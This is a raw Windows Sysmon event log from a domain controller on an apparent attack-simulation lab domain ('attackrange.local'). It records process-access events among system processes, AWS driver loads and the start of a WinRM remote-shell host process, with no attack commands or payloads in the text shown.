10341000x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+599c8|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.963{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.963{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.931{733EE690-3DF9-5F80-1500-000000007F01}13561460C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7400-000000007F01}4108C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.931{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.931{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.931{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.931{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7400-000000007F01}4108C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 644600x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:50.417C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.916{733EE690-3E21-5F80-7500-000000007F01}41204140C:\Windows\system32\conhost.exe{733EE690-3E21-5F80-7400-000000007F01}4108C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.916{733EE690-3DF9-5F80-1500-000000007F01}13561668C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7200-000000007F01}4000C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.916{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E21-5F80-7500-000000007F01}4120C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 644600x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:50.417C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E21-5F80-7400-000000007F01}4108C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7400-000000007F01}4108C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.912{733EE690-3E21-5F80-7400-000000007F01}4108C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3E1E-5F80-0428-040000000000}0x428040HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.900{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E21-5F80-7200-000000007F01}4000C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.885{733EE690-3E21-5F80-7300-000000007F01}1836748C:\Windows\system32\conhost.exe{733EE690-3E21-5F80-7200-000000007F01}4000C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.885{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E21-5F80-7300-000000007F01}1836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:33.869{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 